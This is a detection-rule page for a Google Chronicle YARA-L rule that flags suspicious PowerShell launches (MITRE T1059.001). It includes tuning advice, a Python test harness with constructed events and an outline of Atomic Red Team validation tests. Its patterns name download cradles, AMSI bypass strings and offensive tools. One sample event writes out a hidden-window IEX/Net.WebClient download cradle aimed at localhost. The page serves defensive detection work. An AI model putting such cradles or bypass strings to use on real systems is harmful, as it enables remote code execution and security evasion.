T1059.001 Google Chronicle · YARA-L

Detect PowerShell in Google Chronicle

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. PowerShell can also download and run executables from the Internet, either writing them to disk first or loading them directly into memory without ever touching disk.

MITRE ATT&CK

Tactic
Execution
Technique
T1059 Command and Scripting Interpreter
Sub-technique
T1059.001 PowerShell
Canonical reference
https://attack.mitre.org/techniques/T1059/001/

YARA-L Detection Query

Google Chronicle (YARA-L)
rule t1059_001_powershell_suspicious_execution {
  meta:
    author = "Argus Detection Engineering"
    description = "Detects suspicious PowerShell execution indicative of MITRE ATT&CK T1059.001 — PowerShell abuse for execution, download cradles, AMSI bypass, and encoded commands."
    severity = "HIGH"
    priority = "HIGH"
    mitre_attack_tactic = "Execution"
    mitre_attack_technique = "T1059.001"
    reference = "https://attack.mitre.org/techniques/T1059/001/"
    version = "1.0"

  events:
    // One process-creation event. For PROCESS_LAUNCH the launched process is
    // target.process; its parent is principal.process.
    $e.metadata.event_type = "PROCESS_LAUNCH"
    // Image gate: Windows powershell.exe / pwsh.exe, or a POSIX pwsh binary.
    (
      $e.target.process.file.full_path = /(?i)\\(powershell|pwsh)\.exe$/ or
      $e.target.process.file.full_path = /(?i)\/(powershell|pwsh)$/
    )
    // Separate statements in the events block are implicitly ANDed, so the
    // image gate above and at least one indicator below must both hold.
    (
      // Encoded command flags
      $e.target.process.command_line = /(?i)-encodedcommand/ or
      $e.target.process.command_line = /(?i)-enc\s/ or
      $e.target.process.command_line = /(?i)-ec\s/ or
      // Download cradles
      $e.target.process.command_line = /(?i)invoke-webrequest/ or
      $e.target.process.command_line = /(?i)iwr\s/ or
      $e.target.process.command_line = /(?i)invoke-restmethod/ or
      $e.target.process.command_line = /(?i)net\.webclient/ or
      $e.target.process.command_line = /(?i)downloadstring/ or
      $e.target.process.command_line = /(?i)downloadfile/ or
      $e.target.process.command_line = /(?i)downloaddata/ or
      $e.target.process.command_line = /(?i)start-bitstransfer/ or
      // AMSI bypass strings
      $e.target.process.command_line = /(?i)amsiutils/ or
      $e.target.process.command_line = /(?i)amsiinitfailed/ or
      $e.target.process.command_line = /(?i)setprotectionlevel/ or
      // Execution policy overrides
      $e.target.process.command_line = /(?i)-executionpolicy\s+bypass/ or
      $e.target.process.command_line = /(?i)-ep\s+bypass/ or
      $e.target.process.command_line = /(?i)-ep\s+unrestricted/ or
      // Hidden window flags
      $e.target.process.command_line = /(?i)-windowstyle\s+hidden/ or
      $e.target.process.command_line = /(?i)-w\s+hidden/ or
      // Inline evaluation, base64 decoding and in-memory decompression
      $e.target.process.command_line = /(?i)invoke-expression/ or
      $e.target.process.command_line = /(?i)iex\(/ or
      $e.target.process.command_line = /(?i)frombase64string/ or
      $e.target.process.command_line = /(?i)io\.compression/ or
      // Known offensive tooling invocations
      $e.target.process.command_line = /(?i)invoke-mimikatz/ or
      $e.target.process.command_line = /(?i)invoke-shellcode/
    )

  condition:
    $e
}
Severity: HIGH · Confidence: HIGH

Google Chronicle YARA-L 2.0 rule detecting suspicious PowerShell execution via UDM PROCESS_LAUNCH events. Matches powershell.exe and pwsh.exe process launches with command lines containing encoded command flags, download cradles, AMSI bypass strings, execution policy overrides, hidden window flags, and known offensive PowerShell tool invocations.

Data Sources

  • Chronicle UDM events ingested from Microsoft Defender for Endpoint, CrowdStrike Falcon, Carbon Black, or Sysmon via the Chronicle forwarder
  • Windows Event Log ingested via the Chronicle Forwarder or BindPlane (Event ID 4688 with command line auditing enabled)

Required Tables

UDM PROCESS_LAUNCH events (target.process.file.full_path, target.process.command_line)

False Positives & Tuning

  • Enterprise software deployment tools (SCCM, Intune MDM) that execute PowerShell with -EncodedCommand as part of application installation or configuration enforcement
  • Legitimate administrative scripts used by help desk or SysAdmin teams that download tooling from internal shares using Net.WebClient or Invoke-WebRequest
  • Backup and monitoring agents (e.g., Veeam, SolarWinds) running PowerShell with hidden windows and download capabilities during scheduled maintenance tasks
  • Tune on what the command actually does, not on the flag: decode -EncodedCommand payloads (base64 of UTF-16LE text) and build exclusions on the decoded content together with the parent process (principal.process) and the launching user, rather than suppressing every encoded launch
  • The rule only sees the launch-time command line. Scripts started with -File, fed over stdin, or obfuscated beyond these strings will not match; pair it with PowerShell Script Block Logging (Event ID 4104) for that coverage
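
The harness below is an added example, not code from this page, from Chronicle, or from the rule's author. It mirrors the rule's process-path and command-line regexes in Python's re module (the subset of RE2 syntax used here behaves the same way), applies them to constructed UDM-shaped PROCESS_LAUNCH events, and decodes -EncodedCommand payloads so an encoded hit can be triaged the way the tuning notes above describe. The indicator group names, the helper functions and every sample event are this example's own; the events are constructed, not captured telemetry.

```python
"""Offline check of the YARA-L indicators against UDM-shaped events (added example)."""
import base64
import re
from typing import Optional

# Process-path gate from the rule: Windows backslash path or a POSIX pwsh path.
PROCESS_PATHS = [r"\\(powershell|pwsh)\.exe$", r"/(powershell|pwsh)$"]

# Command-line indicators from the rule. The group labels are this example's
# own bookkeeping; the rule itself is a single flat OR over all of them.
INDICATORS = {
    "encoded_command": [r"-encodedcommand", r"-enc\s", r"-ec\s"],
    "download_cradle": [r"invoke-webrequest", r"iwr\s", r"invoke-restmethod",
                        r"net\.webclient", r"downloadstring", r"downloadfile",
                        r"downloaddata", r"start-bitstransfer"],
    "amsi_bypass": [r"amsiutils", r"amsiinitfailed", r"setprotectionlevel"],
    "policy_override": [r"-executionpolicy\s+bypass", r"-ep\s+bypass",
                        r"-ep\s+unrestricted"],
    "hidden_window": [r"-windowstyle\s+hidden", r"-w\s+hidden"],
    "inline_eval": [r"invoke-expression", r"iex\(", r"frombase64string",
                    r"io\.compression"],
    "offensive_tool": [r"invoke-mimikatz", r"invoke-shellcode"],
}
_PATHS = [re.compile(p, re.IGNORECASE) for p in PROCESS_PATHS]
_INDICATORS = {g: [re.compile(p, re.IGNORECASE) for p in ps] for g, ps in INDICATORS.items()}

# PowerShell also accepts shortened forms of -EncodedCommand (-e, -enc, -ec, ...).
# The decoder accepts them so triage is not narrower than the shell; the rule
# itself leaves bare -e out because it is far too noisy on its own.
_ENCODED_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+[\"']?([A-Za-z0-9+/=]{4,})", re.IGNORECASE)


def is_powershell(full_path: str) -> bool:
    return any(p.search(full_path) for p in _PATHS)


def matched_indicators(command_line: str) -> dict:
    """Return {group: [pattern, ...]} for every rule regex that fires."""
    hits = {}
    for group, patterns in _INDICATORS.items():
        fired = [p.pattern for p in patterns if p.search(command_line)]
        if fired:
            hits[group] = fired
    return hits


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Decode the -EncodedCommand argument (base64 of UTF-16LE text), or None."""
    m = _ENCODED_ARG.search(command_line)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used only to build a benign sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def evaluate(event: dict) -> Optional[dict]:
    """Apply the rule's events block to one UDM-shaped event; None means no alert."""
    if event.get("metadata", {}).get("event_type") != "PROCESS_LAUNCH":
        return None
    proc = event.get("target", {}).get("process", {})
    if not is_powershell(proc.get("file", {}).get("full_path", "")):
        return None
    cmd = proc.get("command_line", "")
    hits = matched_indicators(cmd)
    if not hits:
        return None
    return {"indicators": hits, "decoded_command": decode_encoded_command(cmd)}


def _event(path: str, cmd: str) -> dict:
    return {"metadata": {"event_type": "PROCESS_LAUNCH"},
            "target": {"process": {"file": {"full_path": path}, "command_line": cmd}}}


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events: the shapes of Test 1 and Test 2 below, an SCCM-style benign
# encoded launch, a plain script launch, and cmd.exe carrying a cradle string
# (must not alert because the image gate fails).
SAMPLE_EVENTS = {
    "atomic_encoded": _event(PS_EXE, "powershell.exe -EncodedCommand dwBoAG8AYQBtAGkA"),
    "atomic_cradle": _event(PS_EXE, "powershell.exe -nop -w hidden -c \"IEX (New-Object "
                            "Net.WebClient).DownloadString('http://127.0.0.1:8080/a.ps1')\""),
    "sccm_benign": _event(PS_EXE, "powershell.exe -NoProfile -ExecutionPolicy Bypass "
                          "-EncodedCommand " + encode_command("Get-Service CcmExec")),
    "plain_script": _event(PS_EXE, "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"),
    "not_powershell": _event(r"C:\Windows\System32\cmd.exe", "cmd.exe /c echo DownloadString"),
}

if __name__ == "__main__":
    for name, ev in SAMPLE_EVENTS.items():
        print(f"{name}: {evaluate(ev)}")
```

Two things the run makes visible that the pattern list alone does not: the SCCM-style event alerts on exactly the same indicators as a malicious one (encoded command plus execution policy override), and only the decoded payload separates them, which is why exclusions should key on decoded content and parent process; and the cradle sample is caught by the Net.WebClient and DownloadString patterns, not by iex\(, because `IEX (` with a space does not match that regex.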

Testing Methodology

Validate this detection against the four Atomic Red Team tests for this sub-technique listed below. Each test names the behaviour to exercise and the telemetry you should expect to see; the executable commands and cleanup steps are available with Pro.

  1. Test 1: Encoded Command Execution

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing '-EncodedCommand dwBoAG8AYQBtAGkA'. Security Event ID 4688 (if command line auditing enabled) with same details. PowerShell ScriptBlock Log Event ID 4104 will show the decoded content 'whoami'.

  2. Test 2: Download Cradle via Net.WebClient

    Expected signal: Sysmon Event ID 1: Process Create with CommandLine containing 'Net.WebClient' and 'DownloadString'. Sysmon Event ID 3: Network Connection to 127.0.0.1:8080. PowerShell ScriptBlock Log Event ID 4104 with full script content. The connection will fail (no listener) but the process creation event still fires.

  3. Test 3: AMSI Bypass via Reflection

    Expected signal: Sysmon Event ID 1: Process Create with CommandLine containing 'AmsiUtils' and 'amsiInitFailed'. PowerShell ScriptBlock Log Event ID 4104 with the reflection code. Windows Defender Event ID 1116 (AMSI detection) in Microsoft-Windows-Windows Defender/Operational log.

  4. Test 4: Execution Policy Bypass with Hidden Window

    Expected signal: Sysmon Event ID 1: Process Create with CommandLine containing '-ExecutionPolicy Bypass' and '-WindowStyle Hidden'. File creation event (Sysmon Event ID 11) for the temp file. PowerShell ScriptBlock Log Event ID 4104.
